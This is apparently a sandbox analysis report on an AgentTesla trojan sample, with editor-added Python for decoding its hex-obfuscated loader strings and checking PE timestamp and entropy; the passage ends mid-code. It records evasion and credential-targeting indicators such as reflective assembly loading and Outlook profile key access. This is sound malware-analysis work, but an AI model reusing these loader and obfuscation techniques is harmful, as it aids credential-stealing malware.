                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeBinary or memory string: OriginalFilenameGeneric.exe4 vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: ykVBUY.exe.9.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe 2CA7CF7146FB8209CF3C6CECB1C5AA154C61E046DC07AFA05E8158F2C0DDE2F6
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeReversingLabs: Detection: 26%
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.logJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@7/6@1/1
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/CommandLine/OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/TaskLoader.csTask registration methods: 'CreateTask'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/RegisteredTaskObjectCacheBase.csTask registration methods: '.cctor', 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', '.ctor', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent(System.Boolean)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/BackEnd/NodeEndpointOutOfProcBase.csSecurity API names: System.Void System.IO.Pipes.PipeSecurity::AddAccessRule(System.IO.Pipes.PipeAccessRule)
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Internal/CommunicationsUtilities.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3264:120:WilError_01
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeMutant created: \Sessions\1\BaseNamedObjects\mwyLJQTCzoERzESbkqhGjwVkw
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: l+C:\Users\user\AppData\Roaming\ykVBUY\*.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361159926.0000000000B93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
                    Source: ykVBUY.exe, 00000010.00000002.380916358.0000000000E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\user\AppData\Roaming\ykVBUY\<.sln
                    Source: ykVBUY.exe, 0000000E.00000002.361590861.0000000002921000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *.slnP#
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
                    Source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.381074717.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe.9.drBinary or memory string: *.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBuild MyApp.csproj /t:Clean
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: /ignoreprojectextensions:.sln
                    Source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.drBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr

Data Obfuscation

Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs | .Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: ___________________________________________________ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, loginForm.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
Source: 0.0.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.ee0000.0.unpack, loginForm.cs | .Net Code: LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] { "4173796D6D65747269634B657945786368616E6765466F726D6174", "69626F6B464269", "Client" } }, null, null)
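The loader in loginForm.cs loads an assembly from a byte array and then reaches into it by reflection, hiding the names it hands to that call as hex strings. The Python below is an editor's example added to this report, not code from the sample, from Joe Sandbox or from any library: it pulls every string literal out of the decompiled call quoted above (the call text is copied from the report; the helper names are the editor's own) and decodes the hex-encoded ones. The two blobs decode to `AsymmetricKeyExchangeFormat` and `ibokFBi`; what the assembly loaded through `AppDomain.Load(byte[])` does with them is not shown in the report, so nothing beyond the decoding is claimed here.

```python
"""Decode the hex-encoded string literals the loader passes to
LateBinding.LateCall(..., "Invoke", ...).  Editor's example for this report,
not code from the sample or Joe Sandbox; DECOMPILED_CALL is the call as the
report prints it, the helpers are the editor's.
"""
import re
from typing import Dict, List

DECOMPILED_CALL = (
    'LateBinding.LateCall(V_0, null, "Invoke", new object[] { null, new object[] '
    '{ "4173796D6D65747269634B657945786368616E6765466F726D6174", '
    '"69626F6B464269", "Client" } }, null, null)'
)

_STRING_LITERAL = re.compile(r'"([^"\\]*)"')        # C# string literals without escapes
_HEX_BLOB = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")     # even-length run of hex digits


def is_hex_literal(s: str) -> bool:
    """True for the loader's encoding: an even-length run of hex digits.
    A short plain word made only of A-F letters would also match, so the
    decoder keeps non-ASCII bytes visible instead of dropping them."""
    return _HEX_BLOB.match(s) is not None


def decode_hex_literal(s: str) -> str:
    """Hex -> text; bytes outside ASCII are shown as \\xNN escapes, not hidden."""
    return bytes.fromhex(s).decode("ascii", errors="backslashreplace")


def decoded_arguments(decompiled: str = DECOMPILED_CALL) -> List[str]:
    """Every string literal of the call, in order, with hex blobs decoded."""
    return [decode_hex_literal(lit) if is_hex_literal(lit) else lit
            for lit in _STRING_LITERAL.findall(decompiled)]


def decode_map(decompiled: str = DECOMPILED_CALL) -> Dict[str, str]:
    """literal -> plaintext, for reporting which blobs hid what."""
    return {lit: decode_hex_literal(lit)
            for lit in _STRING_LITERAL.findall(decompiled) if is_hex_literal(lit)}


if __name__ == "__main__":
    for lit, text in decode_map().items():
        print(f"{lit} -> {text}")
```

Run it against any other `LateCall`/`Invoke` line lifted from a decompiler and it will list the plaintext method and type names the packer tried to keep out of string searches; that is usually enough to know which method of the dropped assembly to break on next.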
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code function: 0_2_07CA3619 push ebx; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067DA472 push 8BFFFFFFh; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D18F7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D18AB push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D2177 push edi; retn 0000h
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067FDA32 push eax; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5EFD push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5F7F push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FDF push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FD7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FC7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FBF push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5FB7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F5F8F push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6077 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F606F push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6067 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F605F push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6057 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F604F push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F6027 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60FF push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60F7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60EF push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60E7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60BF push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60B7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60AF push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F60A7 push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F609F push es; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F610F push es; ret
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: 0xCED63224 [Mon Dec 18 16:53:56 2079 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.97974117818
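Two of the static indicators just listed, a compile timestamp in the year 2079 and a .text section whose entropy is within a few hundredths of the 8.0 maximum, are cheap to confirm before detonating anything. The Python below is an editor's example added to this report (not code from the sample, from Joe Sandbox or from a PE library): it reads `IMAGE_FILE_HEADER.TimeDateStamp` by hand from a PE buffer and computes Shannon entropy over a section's bytes. The PE prefix and the two section byte strings it builds are constructed for the demo; the timestamp is the report's 0xCED63224, and the 7.2 packing threshold is the editor's rule of thumb, not a value from the report. One caveat a practitioner should keep in mind: Roslyn's deterministic builds write a content hash into the TimeDateStamp field, so an implausible date on its own is weak evidence and should be read together with the entropy figure and the Yara hits above.

```python
"""Static triage for two indicators in this report: the PE compile timestamp
0xCED63224 (year 2079) and a .text section with entropy near 8.  Editor's
example, not sample, report or library code; the PE buffer and section bytes
are constructed for the demo, and the 7.2 packing threshold is a rule of thumb.
"""
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Dict, Optional

REPORT_TIMESTAMP = 0xCED63224       # value listed in the report
ENTROPY_PACKED_THRESHOLD = 7.2      # editor's threshold: above this, treat as packed/encrypted


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, from 0.0 (one byte value) to 8.0 (uniform distribution)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def coff_timestamp(pe: bytes) -> int:
    """IMAGE_FILE_HEADER.TimeDateStamp: e_lfanew is at 0x3C, then 'PE\\0\\0',
    Machine (2 bytes) and NumberOfSections (2 bytes), so the stamp is at e_lfanew + 8."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", pe, e_lfanew + 8)[0]


def timestamp_verdict(stamp: int, now: Optional[datetime] = None) -> Dict[str, object]:
    """Render the stamp the way the report does and flag dates after 'now'.
    Caveat: Roslyn deterministic builds store a content hash in this field,
    so a nonsense date is only weak evidence by itself."""
    now = now or datetime.now(timezone.utc)
    when = datetime.fromtimestamp(stamp, tz=timezone.utc)
    return {"timestamp": when.strftime("%a %b %d %H:%M:%S %Y UTC"),
            "in_future": when > now}


def build_minimal_pe_header(stamp: int) -> bytes:
    """Constructed PE prefix for the demo: MZ stub with e_lfanew = 0x80, the
    'PE\\0\\0' signature and a COFF header (i386, 3 sections, the given stamp).
    Only the fields coff_timestamp() reads are meaningful."""
    buf = bytearray(0x80)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    coff = struct.pack("<HHIIIHH", 0x014C, 3, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(buf) + b"PE\0\0" + coff


def triage(pe: bytes, text_section: bytes, now: Optional[datetime] = None) -> Dict[str, object]:
    """Combine both checks into one record for the sample."""
    verdict = timestamp_verdict(coff_timestamp(pe), now)
    ent = shannon_entropy(text_section)
    verdict["text_entropy"] = round(ent, 3)
    verdict["likely_packed"] = ent >= ENTROPY_PACKED_THRESHOLD
    return verdict


# Constructed stand-ins (not bytes from the sample): a uniform byte
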